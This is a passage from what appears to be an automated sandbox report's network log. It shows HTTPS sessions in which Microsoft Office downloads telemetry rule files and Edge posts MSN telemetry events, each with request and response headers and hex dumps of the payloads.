                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Wed, 27 Nov 2024 08:05:53 GMT
                                                                                                                                                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                    x-ms-route-info: C525_BL2
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f4b14360-9210-438b-ab24-b3c3570dfb1a
                                                                                                                                                                                                                                                                                                                    PPServer: PPV: 30 H: BL02EPF0001D8AB V: 0
                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Content-Length: 11389
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC11389INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    119192.168.2.74989913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:53 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:53 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 419
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 4f79ec39-601e-0070-0891-3fa0c9000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080653Z-174f7845968nxc96hC1EWRspw80000000weg00000000312x
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    120192.168.2.74990313.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:54 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 472
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: a1da7612-c01e-0014-5d80-3fa6a3000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080654Z-174f78459688l8rvhC1EWRtzr000000009a0000000002d8h
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:54 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    121192.168.2.74990413.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:55 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 405
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B942B6AFF"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 1fa1d210-401e-0067-3791-3f09c2000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080655Z-174f7845968vqt9xhC1EWRgten0000000wqg000000005arq
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    122192.168.2.74990720.42.73.304438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC1044OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700973619&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 11586
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC11586OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 37 54 30 39 3a 34 39 3a 33 33 2e 36 31 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 35 65 65 61 32 35 37 2d 63 34 35 66 2d 34 35 62 38 2d 39 37 62 62 2d 64 33 32 36 64 36 39 39 39 37 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 31 32 31 38 31 38 37 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-27T09:49:33.615Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"45eea257-c45f-45b8-97bb-d326d6999772","epoch":"1412181873"},"app":{"locale
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=e0af5278c6bd4562b513d20529db581f&HASH=e0af&LV=202411&V=4&LU=1732694815553; Domain=.microsoft.com; Expires=Thu, 27 Nov 2025 08:06:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=09157c9a88fb4d4e961ecf4ab7b35d91; Domain=.microsoft.com; Expires=Wed, 27 Nov 2024 08:36:55 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    time-delta-millis: -6158066
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:55 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    123192.168.2.74990513.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:55 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBA642BF4"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: f58191a5-b01e-003e-1291-3f8e41000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080655Z-174f7845968qj8jrhC1EWRh41s0000000wkg000000006gkt
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    124192.168.2.74990613.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:55 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 174
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B91D80E15"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 8c2ab7fe-e01e-0003-5b91-3f0fa8000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080655Z-174f7845968zgtf6hC1EWRqd8s0000000phg000000008zs5
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    125192.168.2.74990820.42.73.304438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC1043OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700973623&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 5051
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1; _C_ETH=1; msnup=
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:55 UTC5051OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 37 54 30 39 3a 34 39 3a 33 33 2e 36 32 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 35 65 65 61 32 35 37 2d 63 34 35 66 2d 34 35 62 38 2d 39 37 62 62 2d 64 33 32 36 64 36 39 39 39 37 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 31 32 31 38 31 38 37 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-11-27T09:49:33.622Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"45eea257-c45f-45b8-97bb-d326d6999772","epoch":"1412181873"},"app":{"locale
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:56 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
